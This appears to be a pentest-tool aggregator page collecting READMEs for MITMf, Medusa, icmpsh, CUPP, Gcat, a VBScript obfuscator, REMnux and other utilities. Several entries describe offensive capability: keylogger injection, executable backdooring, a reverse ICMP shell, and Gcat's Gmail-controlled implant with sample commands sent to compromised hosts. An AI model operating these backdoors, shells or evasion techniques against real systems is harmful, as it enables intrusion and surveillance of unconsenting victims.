KitPloit - PenTest Tools!

Proxenet is a hacker friendly proxy for web application penetration tests.

proxenet is a multi-threaded proxy which allows you manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenetsupports heaps of languages (see the section "Language Versions") and more can be easily added.

proxenet is not script kiddie friendly, neither GUI friendly. If this is what you are looking for, here are a few links for you:

Or the best way, write your own GUI as a proxenet plugin!

Why ?

The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few proxies already existing supports the possibility to add new extensions. And when they do, they are (one) language specific - despite Burp persistent attempts to make unnatural bindings (Python over Java or worse Ruby over Java.

Being written in pure C, it is fast, efficient and easily pluggable to anything else. It is the utimate real DIY web proxy for pentest(ers).

Features

Here are a sample of features already supported by proxenet:

Written in C
- Fast (heavy thread use)
- Efficient (POSIX compatible)
- Low memory footprint (for the core)
Can interact with any language
Provides plugins support for the following languages:
- C
- Python
- Lua
- Ruby
- Perl
- Tcl
- Java
SSL
- Full SSL interception (internal CA)
- SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source

... and more !

The best of both world ?

Some people might miss the beautiful interface some other GUI-friendly proxies provide. So be it! Plug proxenet as a relay behind your favorite Burp, Zap, Proxystrike, burst, etc. and enjoy the show!

How to start

$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make

Download Proxenet

Framework for Man-In-The-Middle attacks

Available plugins

SMBtrap - Exploits the 'SMB Trap' vulnerability on connected clients
Screenshotter - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transperently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
jskeylogger - Injects a Javascript keylogger into a client's webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication attempts
Upsidedownternet - Flips images 180 degrees

How to install on Kali

apt-get install mitmf

Installation
If MITMf is not in your distro's repo or you just want the latest version:

Run the command git clone https://github.com/byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r requirements.txt to install all Python dependencies

On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ImportError: no module named pcap, run apt-get install python-pypcap to fix it

Download MITMf

Automatically brute force all services running on a target including:

Open ports
DNS domains
Web files
Web directories
Usernames
Passwords

USAGE

./brutex target

DEPENDENCIES

NMap
Hydra
Wfuzz
SNMPWalk
DNSDict

To brute force multiple hosts, use brutex-massscan and include the IP's/hostnames to scan in the targets.txt file.

Download BruteX

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Why?

Why create Medusa? Isn't this the same thing as THC-Hydra? Here are some of the reasons for this application:

Application stability. Maybe I'm just lame, but Hydra frequently crashed on me. I was no longer confident that Hydra was actually doing what it claimed to be. Rather than fix Hydra, I decided to create my own buggy application which could crash in new and exciting ways.
Code organization. A while back I added several features to Hydra (parallel host scanning, SMBNT module). Retro-fitting the parallel host code to Hydra was a serious pain. This was mainly due to my coding ignorance, but was probably also due to Hydra not being designed from the ground-up to support this. Medusa was designed from the start to support parallel testing of hosts, users and passwords.
Speed. Hydra accomplishes its parallel testing by forking off a new process for each host and instance of the service being tested. When testing many hosts/users at once this creates a large amount of overhead as user/password lists must be duplicated for each forked process. Medusa is pthread-based and does not unnecessarily duplicate information.
Education. I am not an experienced C programmer, nor do I consider myself an expert in multi-threaded programming. Writing this application was a training exercise for me. Hopefully, the results of it will be useful for others.

Module specific details:

AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form

News

2015-06-07: Released Medusa v2.2_rc2

2015-05-28: Released Medusa v2.2_rc1

2012-05-25: Released Medusa v2.1.1

2012-04-02: Released Medusa v2.1

2011-03-04: tak and bigmoneyhat have released a Java-based GUI for Medusa (Medusa-gui)

2010-02-09: Released Medusa v2.0

Download Medusa

Chrome Autofill Viewer is the free tool to easily see and delete all your autocomplete data from Google Chrome browser.

Chrome stores Autofill entries (typically form fields) such as login name, pin, passwords, email, address, phone, credit/debit card number, search history etc in an internal database file.

'Chrome Autofill Viewer' helps you to automatically find and view all the Autofill history data from Chrome browser. For each of the entry, it display following details,

Field Name
Value
Total Used Count
First Used Date
Last Used Date

You can also use it to view from history file belonging to another user on same or remote system. It also provides one click solution to delete all the displayed Autofill data from the history file.

It is very simple to use for everyone, especially makes it handy tool for Forensic investigators.

Chrome Autofill Viewer is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features

Instantly view all the Autofill list from Chrome browser
On startup, it auto detects Autofill file from Chrome's default profile location
Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
Delete all the Autofill data with just a click of button
Save the displayed Autofill list to HTML/XML/TEXT/CSV file
Easier and faster to use with its enhanced user friendly GUI interface
Fully Portable, does not require any third party components like JAVA, .NET etc
Support for local Installation and uninstallation of the software

How to Use?

Chrome Autofill Viewer is easy to use with its simple GUI interface.

Here are the brief usage details

Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill file from default profile location of Chrome. You can also select the desired file manually.
Next click on 'Show All' button and all stored Autofill data will be displayed in the list as shown in screenshot 1 below.
If you want to remove all the entries, click on 'Delete All' button below.
Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

Download Chrome Autofill Viewer

REMnux is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software. It strives to make it easier for forensic investigators and incident responders to start using the variety of freely-available tools that can examine malware, yet might be difficult to locate or set up.

The heart of the project is the REMnux Linux distribution based on Ubuntu. This lightweight distro incorporates many tools for analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.

Malware Analyis Tools Installed on REMnux

The REMnux distribution includes many free tools useful for examining malicious software. These utilities are set up and tested to make it easier for you to perform malware analysis tasks without needing to figure out how to install them. The majority of these tools are listed below.

Examine Browser Malware

Website analysis: Thug, mitmproxy, Network Miner Free Edition, curl, Wget, Burp Proxy Free Edition, Automater, pdnstool, Tor, tcpextract, tcpflow, passive.py, CapTipper
Flash: xxxswf, SWF Tools, RABCDAsm, extract_swf, Flare
Java: Java Cache IDX Parser, JD-GUI Java Decompiler, JAD Java Decompiler, Javassist, CFR
JavaScript: Rhino Debugger, ExtractScripts, Firebug, SpiderMonkey, V8, JS Beautifier

Examine Document Files

PDF: AnalyzePDF, Pdfobjflow, pdfid, pdf-parser, peepdf, Origami, PDF X-RAY Lite, PDFtk, swf_mastah
Microsoft Office: officeparser, pyOLEScanner.py, oletools, libolecf, oledump, emldump
Shellcode: sctest, unicode2hex-escaped, unicode2raw, dism-this, shellcode2exe

Extract and Decode Artifacts

Deobfuscate: unXOR, XORStrings, ex_pe_xor, XORSearch, brutexor/iheartxor, xortool, NoMoreXOR, XORBruteForcer, Balbuzard
Extract strings: strdeobj, pestr, strings
Carving: Foremost, Scalpel, bulk_extractor, Hachoir

Handle Network Interactions

Sniffing: Wireshark, ngrep, TCPDump, tcpick
Services: FakeDNS, Nginx, fakeMail, Honeyd, INetSim, Inspire IRCd, OpenSSH, accept-all-ips
Miscellaneous network: prettyping.sh, set-static-ip, renew-dhcp, Netcat, EPIC IRC Client, stunnel

Process Multiple Samples

Maltrieve, Ragpicker, Viper, MASTIFF, Density Scout

Examine File Properties and Contents

Define signatures: YaraGenerator, IOCextractor, Autorule, Rule Editor
Scan: Yara, ClamAV, TrID, ExifTool, virustotal-submit, Disitool
Hashes: nsrllookup, Automater, Hash Identifier, totalhash, ssdeep, virustotal-search, VirusTotalApi

Investigate Linux Malware

System: Sysdig, Unhide
Disassemble: Vivisect, Udis86, objdump
Debug: Evan’s Debugger (EDB), GNU Project Debugger (GDB)
Trace: strace, ltrace
Investigate: Radare 2, Pyew, Bokken, m2elf

Edit and View Files

Text: SciTE, Geany, Vim
Images: feh, ImageMagick
Binary: wxHexEditor, VBinDiff
Documents: Xpdf

Examine Memory Snapshots

Volatility Framework, findaes, AESKeyFinder, RSAKeyFinder, VolDiff, Rekall

Statically Examine PE Files

Unpacking: UPX, Bytehist, Density Scout, PackerID
Disassemble: objdump, Udis86, Vivisect
Find anomalies: Signsrch, pescanner, ExeScan, pev, Peframe, pedump
Investigate: Bokken, RATDecoders, Pyew, readpe.py, PyInstaller Extractor

Investigate Mobile Malware

Androwarn, AndroGuard

Perform Other Tasks

ProcDOT, bashhacks, Docker, vtTool, REMnux Updater, Decompyle++

REMnux Documentation

REMnux documentation is a relatively recent effort, which can provide additional details regarding the toolkit. The document set in need of improvement and expansion.

The one-page REMnux cheat sheet highlights some of the most useful tools and commands available as part of the REMnux distro. It’s an especially nice starting point for people who are new to the distribution.

Malware Analysis Essentials Using REMnux

Download REMnux v6

crouton is a set of scripts that bundle up into an easy-to-use, Chromium OS-centric chroot generator. Currently Ubuntu and Debian are supported (using debootstrap behind the scenes), but "Chromium OS Debian, Ubuntu, and Probably Other Distros Eventually Chroot Environment" doesn't acronymize as well (crodupodece is admittedly pretty fun to say, though).

"crouton"...an acronym?

It stands for ChRomium Os Universal chrooT envirONment...or something like that. Do capitals really matter if caps-lock has been (mostly) banished, and the keycaps are all lower-case?

Moving on...

Who's this for?

Anyone who wants to run straight Linux on their Chromium OS device, and doesn't care about physical security. You're also better off having some knowledge of Linux tools and the command line in case things go funny, but it's not strictly necessary.

What's a chroot?

Like virtualization, chroots provide the guest OS with their own, segregated file system to run in, allowing applications to run in a different binary environment from the host OS. Unlike virtualization, you are not booting a second OS; instead, the guest OS is running using the Chromium OS system. The benefit to this is that there is zero speed penalty since everything is run natively, and you aren't wasting RAM to boot two OSes at the same time. The downside is that you must be running the correct chroot for your hardware, the software must be compatible with Chromium OS's kernel, and machine resources are inextricably tied between the host Chromium OS and the guest OS. What this means is that while the chroot cannot directly access files outside of its view, it can access all of your hardware devices, including the entire contents of memory. A root exploit in your guest OS will essentially have unfettered access to the rest of Chromium OS.

...but hey, you can run TuxRacer!

Prerequisites

You need a device running Chromium OS that has been switched to developer mode.

For instructions on how to do that, go to this Chromium OS wiki page, click on your device model and follow the steps in the Entering Developer Modesection.

Note that developer mode, in its default configuration, is completely insecure, so don't expect a password in your chroot to keep anyone from your data. crouton does support encrypting chroots, but the encryption is only as strong as the quality of your passphrase. Consider this your warning.

It's also highly recommended that you install the crouton extension, which, when combined with the extension or xiwitargets, provides much improved integration with Chromium OS.

That's it! Surprised?

Usage

crouton is a powerful tool, and there are a lot of features, but basic usage is as simple as possible by design.

If you're just here to use crouton, you can grab the latest release from https://goo.gl/fd3zc. Download it, pop open a shell (Ctrl+Alt+T, type shell and hit enter), and run sh ~/Downloads/crouton to see the help text. See the "examples" section for some usage examples.

If you're modifying crouton, you'll probably want to clone or download the repo and then either run installer/main.sh directly, or use make to build your very own crouton. You can also download the latest release, cd into the Downloads folder, and run sh crouton -x to extract out the juicy scripts contained within, but you'll be missing build-time stuff like the Makefile.

crouton uses the concept of "targets" to decide what to install. While you will have apt-get in your chroot, some targets may need minor hacks to avoid issues when running in the chrooted environment. As such, if you expect to want something that is fulfilled by a target, install that target when you make the chroot and you'll have an easier time. Don't worry if you forget to include a target; you can always update the chroot later and add it. You can see the list of available targets by running sh ~/Downloads/crouton -t help.

Once you've set up your chroot, you can easily enter it using the newly-installed enter-chroot command, or one of the target-specific start* commands. Ta-da! That was easy.

Read more here.

Download Crouton

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus on this tool.

Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl.

Features

Open source software - primarily coded by Nico, forked by me.
Client/server architecture.
The master is portable across any platform that can run either C, Perl or Python code.
The target system has to be Windows because the slave runs on that platform only for now.
The user running the slave on the target system does not require administrative privileges.

Usage

Running the master

The master is straight forward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies:

IO::Socket
NetPacket::IP
NetPacket::ICMP

When running the master, don't forget to disable ICMP replies by the OS. For example:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands send from the master.

Running the slave

The slave comes with a few command line options as outlined below:

-t host            host ip address to send ping requests to. This option is mandatory!

-r                 send a single test icmp request containing the string "Test1234" and then quit. 
                   This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.

-b num             limit of blanks (unanswered icmp requests before quitting

-s bytes           maximal data buffer size in bytes

In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.

Download icmpsh

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.

A weak password might be very short or only use alphanumberic characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

That is why CUPP has born, and it can be used in situations like legal penetration tests or forensic crime investigations.

Options

Usage: cupp.py [OPTIONS]

    -h      this menu

    -i      Interactive questions for user password profiling

    -w      Use this option to profile existing dictionary,
            or WyD.pl output to make some pwnsauce :)

    -l      Download huge wordlists from repository

    -a      Parse default usernames and passwords directly from Alecto DB.
            Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.

    -v      Version of the program

Configuration
CUPP has configuration file cupp.cfg with instructions.

Download Cupp

A stealthy Python based backdoor that uses Gmail as a command and control server.

Setup

For this to work you need:

A Gmail account (Use a dedicated account! Do not use your personal one!)
Turn on "Allow less secure apps" under the security settings of the account

This repo contains two files:

gcat.py a script that's used to enumerate and issue commands to available clients
implant.py the actual backdoor to deploy

In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.

You're probably going to want to compile implant.py into an executable using Pyinstaller

Usage

Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

The output is a UUID string that uniquely identifies the system and the OS the implant is running on

Let's issue a command to an implant:

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command

Lets get the results!

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --

That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

Download Gcat

VBScript obfuscation to allow PenTesters bypass countermeasures.

Sample Script Output

C:\tools>python obfuscator.py test.vbs out.vbs
Char 109 -> 5505-5396
Char 115 -> 1113775/9685
Char 103 -> 540853/5251
Char 98 -> -2629+2727
Char 111 -> 291-180
Char 120 -> 826320/6886
Char 32 -> 118016/3688
Char 34 -> -2379+2413
Char 72 -> 2401-2329
Char 101 -> -1347+1448
Char 108 -> 759780/7035
Char 108 -> 5391-5283
Char 111 -> 743700/6700
Char 32 -> 7654-7622
Char 87 -> 636927/7321
Char 111 -> -46+157
Char 114 -> 7591-7477
Char 108 -> -9028+9136
Char 100 -> 285800/2858
Char 33 -> 5241-5208
Char 34 -> 7209-7175
Char 44 -> 234080/5320
Char 32 -> 104352/3261
Char 118 -> -3369+3487
Char 98 -> -7575+7673
Char 79 -> -9140+9219
Char 107 -> 4317-4210
Char 79 -> -5433+5512
Char 110 -> -1294+1404
Char 108 -> 6672-6564
Char 121 -> 1109-988
Char 32 -> 166080/5190
Char 43 -> 95675/2225
Char 32 -> 3156-3124
Char 118 -> -9572+9690
Char 98 -> -3093+3191
Char 73 -> 53947/739
Char 110 -> -2239+2349
Char 102 -> 554982/5441
Char 111 -> 4953-4842
Char 114 -> 907440/7960
Char 109 -> 3406-3297
Char 97 -> 3570-3473
Char 116 -> 3624-3508
Char 105 -> 137130/1306
Char 111 -> 632-521
Char 110 -> 8712-8602
Char 44 -> 94468/2147
Char 32 -> 14176/443
Char 34 -> 884/26
Char 84 -> -9768+9852
Char 104 -> -5195+5299
Char 105 -> 706335/6727
Char 115 -> 6469-6354
Char 32 -> 250304/7822
Char 105 -> -9605+9710
Char 115 -> 771190/6706
Char 32 -> -1319+1351
Char 97 -> 674053/6949
Char 32 -> -6907+6939
Char 109 -> 3365-3256
Char 101 -> 170791/1691
Char 115 -> 17020/148
Char 115 -> 3217-3102
Char 97 -> -6948+7045
Char 103 -> -9545+9648
Char 101 -> 9670-9569
Char 98 -> 926002/9449
Char 111 -> 130869/1179
Char 120 -> 255600/2130
Char 34 -> -1384+1418
Char 42 -> 1784-1742
Done!

Results (comparison)
First output

Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx = "6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*5179-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-6681+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*741684/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-6336*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*128533/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-5364*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*3171-3055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-3164+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*330840/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx, chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)

Second output

Dim wEQHvB, vsSBaV, pwgtko
wEQHvB = "-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938-818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+5058*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9482*347644/7901*181536/5673*198712/1684*615734/6283*779-700*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*1276-1171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-773+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)

Download VBS-Obfuscator

cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind *nix system administrators of options for commands that they use frequently, but not frequently enough to remember.

cheat depends only on python and pip.

Example

The next time you're forced to disarm a nuclear weapon without consulting Google, you may run:

cheat tar

You will be presented with a cheatsheet resembling:

# To extract an uncompressed archive: 
tar -xvf /path/to/foo.tar

# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz

# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/

# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tgz

# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/

To see what cheatsheets are availble, run cheat -l.
Note that, while cheat was designed primarily for *nix system administrators, it is agnostic as to what content it stores. If you would like to use cheatto store notes on your favorite cookie recipes, feel free.

Installing

Using pip

sudo pip install cheat

Using homebrew

brew install cheat

Manually
First install the required python dependencies with:

sudo pip install docopt pygments

Then, clone this repository, cd into it, and run:

sudo python setup.py install

Modifying Cheatsheets

The value of cheat is that it allows you to create your own cheatsheets - the defaults are meant to serve only as a starting point, and can and should be modified.

Cheatsheets are stored in the ~/.cheat/ directory, and are named on a per-keyphrase basis. In other words, the content for the tar cheatsheet lives in the ~/.cheat/tar file.

Provided that you have an EDITOR environment variable set, you may edit cheatsheets with:

cheat -e foo

If the 'foo' cheatsheet already exists, it will be opened for editing. Otherwise, it will be created automatically.

After you've customized your cheatsheets, I urge you to track ~/.cheat/ along with your dotfiles.

Download Cheat

These security cheatsheets are part of a project for the Ethical Hacking and Penetration Testing course offered at the University of Florida. Expanding on the default set of cheatsheets, the purpose of these cheatsheets are to aid penetration testers/CTF participants/security enthusiasts in remembering commands that are useful, but not frequently used. Most of the tools that will be covered have been included in our class and are available in Kali Linux.

Requirements

The only requirement to use these cheatsheets is for cheat to be installed.

How to Use

In order to use these cheatsheets, the cheatsheets in this repository need to go into ~/.cheat/ directory. After the files are moved into that directory, cheat ncat will display the ncat cheatsheet.

CheatSheets:

aircrack-ng
cewl
cidr
cookies
dig
fierce
ftp
http
https-ssl-tls
hydra
john
maltego
markdown
medusa
metasploit
mysql
ncat
nikto
nping
permissions
php
pivoting
ps
python
ruby
shadow
shodan
sqlmap
tcpdump
webservervulns
wireless-encryptions
wireshark

Download Security CheatSheets

Just-Metadata is a tool that can be used to gather intelligence information passively about a large number of IP addresses, and attempt to extrapolate relationships that might not otherwise be seen. Just-Metadata has "gather" modules which are used to gather metadata about IPs loaded into the framework across multiple resources on the internet. Just-Metadata also has "analysis" modules. These are used to analyze the data loaded Just-Metadata and perform various operations that can identify potential relationships between the loaded systems.

Just-Metadata will allow you to quickly find the Top "X" number of states, cities, timezones, etc. that the loaded IP addresses are located in. It will allow you to search for IP addresses by country. You can search all IPs to find which ones are used in callbacks as identified by VirusTotal. Want to see if any IPs loaded have been documented as taking part of attacks via the Animus Project, Just-Metadata can do it.

Additionally, it is easy to create new analysis modules to let people find other relationships between IPs loaded based on the available data. New intel gathering modules can be easily added in just as easily!

Setup

Ideally, you should be able to run the setup script, and it will install everything you need.

For the Shodan information gathering module, YOU WILL NEED a Shodan API key. This costs like $9 bucks, come on now, it's worth it :).

Usage

As of now, Just metadata is designed to read in a single text file containing IPs, each on their own new line. Create this file from any source (C2 callback IPs, web server logs, etc.). Once you have this file, start Just-Metadata by calling it:

./Just-Metadata.py

Commands

help - Once in the framework, to see a listing of available commands and a description of what they do, type the "help" command.

load <filename> - The load command takes an extra parameter, the file name that you (the user) want Just-Metadata to load IP addresses from. This command will open, and load all IPs within the file to the framework.

Ex: load ipaddresses.txt

save - The save command can be used to save the current working state of Just-Metadata. This is helpful in multiple cases, such as after gathering information about IPs, and wanting to save the state off to disk to be able to work on them at a later point in time. Simply typing "save" will result in Just-Metadata saving the state to disk, and displaying the filename of the saved state.

import <statefile> - The import command can be used to load a previously saved Just-Metadata state into the framework. It will load all IPs that were saved, and all information gathered about the IP addresses. This command will require an extra parameter, the name of the state file that you want Just-Metadata to load.

Ex: import goodfile.state

list <module type> - The list command can be used to list the different types of modules loaded into Just-Metadata. This command will take an extra parameter, either "analysis" or "gather". Just-Metadata will display all mofules of the type that the user requests is listed.

Ex: list analysis

Ex: list gather

gather <gather module name> - The gather command tells Just-Metadata to run the module specified and gather information from that source. This can be used to gather geographical information, Virustotal, whois, and more. It's all based on the module. The data gathered will be stored within the framework in memory and can also be saved to disk with the "save" command.

Ex: gather geoinfo

Ex: gather virustotal

analyze <analysis module name> - The analyze command tells Metadata to run an analysis module against the data loaded into the framework. These modules can be used to find IP addresses that share the same SSH keys or SSL Public Key certificates, or certificate chains. They can also be used to find IP addresses used in the same callbacks by malicious executables.

ip_info <IP Address> - This command is used to dump all information about a specific IP address. This is currently being used after having run analysis modules. For example, after identifying IP addresses that share the same SSH keys, I can dump all information about those IPs. I will see if they have been used by malware, where they are located, etc.

export - The export command will have Just-Metadata dump all information that's been gathered about all IP addresses currently loaded into the framework to CSV.

Read more here.

Download Just-Metadata

All network administrators do recognize how important it is to have a well managed IP space: a comprehensive and up to date inventory of all subnets and IPs used in a network as well as clear and simple processes to request, change or release IPs are underlying key factors for a trouble free network.

Unfortunately, in many companies or organizations, IP Management is not perceived as a critical service of IT operations. And when it is recognized as such, the price of standard solutions sold from software vendors is so high that investment in a tool is always postponed to the next fiscal exercise.

As a consequence, network administrators often struggle to keep a decent inventory of their IP space and they rely by default on inconvenient Excel spread sheets or DNS configuration files to do their job.

TeemIp application has been created to precisely answer that problematic. It is a robust Open Source web 2.0 solution that enables professional IP Management activity within IT departments of all size.

A simple and powerful user interface will allow network administrators to manage their IPv4 and IPv6 Plans, subnet space and IPs in accordance with best in class IP Management practices:

Define your IPv4 and IPv6 Plans through hierarchical Network Blocks
Delegate IP blocks from parent to child organizations
Manage Subnets within predefined Network Blocks
Attach IP Ranges to your Subnets
Register IPs and get a clear view on the IP space consumption
Allow end user to log IP requests through a simple WEB portal
Provide Hostmasters efficient processes to manage user requests
Proactively notify administrators on key events
Synchronize your data with external tools

Because IPs are configured on network devices, a CMDB (Configuration Management Data Base) has been included in the product. This CMDB allows you to document all types of devices that can be connected to an IP network together with their linkage toward the IP space (IPs they use, like management IPs, or IPs they host, like on router interfaces).

In order to provide to the end users an easy way to log IP related requests, a WEB portal has been incorporated to TeemIp. Tickets created through that portal are then processed through a Helpdesk module thus providing to the network administrator a quick, efficient and easy process to allocate, change or release IP resources.

TeemIp has been developped as an extension of iTop open source ITSM and CMDB software and therefore benefits from all its features and advanced functions. It is available as a standalone application or as a module that can be installed on an already working iTop solution.

TeemIp application is relying on Apache, MySQL and PHP, so it can run on whatever operating system supporting those applications: it has been already tested on Windows, Linux Debian and Redhat. Because it is a web based application you don’t need to install any client on user PC. A simple web browser is enough to use it.

Download TeemIp

VBScan is a Black Box vBulletin vulnerability scanner. Written in Perl

Demo on youtube:

Security Bug Found by VBScan in Ubuntu / Fedora/ python forums by VBScan Vulnerability Scanner

Report any bug to : me@reza.es

Download VBScan

Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over £3m per breach, at the higher end.

